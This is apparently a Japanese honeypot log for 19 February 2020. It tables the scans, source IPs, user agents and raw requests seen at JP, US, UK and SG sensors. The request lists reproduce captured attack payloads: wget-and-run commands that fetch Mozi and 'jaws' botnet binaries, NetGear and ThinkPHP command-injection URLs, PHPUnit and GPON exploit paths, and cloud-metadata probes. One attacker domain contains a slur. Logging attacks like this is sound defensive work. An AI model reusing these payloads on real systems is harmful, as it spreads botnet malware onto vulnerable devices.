ハニーポット(仮) 観測記録 2020/02/19分です。
特徴
Location:JP
NetGear製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
18[.]179[.]20[.]5に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws; sh /tmp/jaws
Location:US
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
ZmEuによるスキャン行為
UserAgentがHello, worldであるアクセス
FreePBXに対するログイン試行するアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http://jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws; sh /tmp/jaws
Location:UK
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
Apache Tomcatへのスキャン行為
Apache Solrへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:155 (前日比:+68)
US:総アクセス数:21 (前日比:+12)
UK:総アクセス数:19 (前日比:+5)
SG:総アクセス数:27 (前日比:+9)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 111.61.41.133 | China |
| 1 | 115.204.95.101 | China |
| 1 | 115.229.249.147 | China |
| 1 | 116.252.0.140 | China |
| 1 | 116.252.0.76 | China |
| 1 | 121.57.8.55 | China |
| 1 | 123.145.35.202 | China |
| 101 | 123.209.71.194 | Australia |
| 1 | 175.184.167.169 | China |
| 1 | 185.31.163.237 | Russia |
| 1 | 195.154.92.15 | France |
| 1 | 213.128.88.99 | Turkey |
| 1 | 221.13.12.250 | China |
| 1 | 221.213.75.245 | China |
| 1 | 222.186.19.221 | China |
| 1 | 223.166.75.188 | China |
| 34 | 44.224.22.196 | United States |
| 1 | 45.136.108.64 | Germany |
| 1 | 45.143.221.47 | Netherlands |
| 1 | 60.208.211.117 | China |
| 2 | 80.82.68.18 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 24 | - |
| 14 | AWS Security Scanner |
| 1 | Go-http-client/1.1 |
| 1 | Hello, world |
| 1 | Mozilla/5.01694878 Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
| 4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]ipip[.]net:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
| 1 | GET | //admin/config.php?password%5B0%5D=ZIZO&username=admin | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | http://boxun[.]com/ | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
| 1 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
| 1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
| 1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115[.]229[.]249[.]147:49198/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws;sh+/tmp/jaws | HTTP/1.1 |
| 1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
| 1 | POST | /images.php | HTTP/1.1\n |
| 2 | \x03 | ||
| 10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 104.40.242.46 | United States |
| 10 | 117.50.37.49 | China |
| 1 | 125.230.218.132 | Taiwan |
| 1 | 222.186.19.221 | China |
| 1 | 223.149.255.196 | China |
| 1 | 223.155.100.67 | China |
| 1 | 35.171.165.104 | United States |
| 1 | 37.49.230.69 | Netherlands |
| 1 | 45.143.221.47 | Netherlands |
| 1 | 47.106.81.224 | China |
| 2 | 88.218.227.69 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 2 | Go-http-client/1.1 |
| 3 | Hello, world |
| 1 | Mozilla/5.0 |
| 10 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-042stab141.3 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64 |
| 2 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | //admin/config.php?password%5B0%5D=ZIZO&username=admin | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | //login_sid.lua | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws;sh+/tmp/jaws | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 1 | GET | /webdav/ | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | \x16\x03\x01\x01D\x01 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 7 | 165.22.87.30 | United States |
| 1 | 182.222.195.132 | South Korea |
| 1 | 198.108.66.240 | United States |
| 1 | 222.139.29.171 | China |
| 1 | 222.186.19.221 | China |
| 1 | 41.216.186.89 | South Africa |
| 1 | 45.136.108.68 | Germany |
| 1 | 5.101.0.209 | Russia |
| 1 | 60.191.66.222 | China |
| 1 | 72.64.128.50 | United States |
| 1 | 79.101.58.70 | Serbia |
| 2 | 80.82.68.69 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | //Admin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | \x03 | ||
| 1 | \x16\x03\x01 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 120.27.27.17 | China |
| 1 | 122.112.179.159 | China |
| 5 | 193.57.40.38 | Ukraine |
| 1 | 195.154.92.15 | France |
| 10 | 203.44.88.146 | Australia |
| 1 | 222.186.19.221 | China |
| 1 | 41.216.186.89 | South Africa |
| 1 | 45.143.221.47 | Netherlands |
| 1 | 54.208.81.117 | United States |
| 1 | 60.191.66.222 | China |
| 4 | 82.221.105.6 | Iceland |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 2 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | python-requests/2.10.0 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | //admin/config.php?password%5B0%5D=ZIZO&username=admin | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 2 | GET | /index.action | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | \x03 | ||
| 1 | \x16\x03\x01\x01D\x01 |
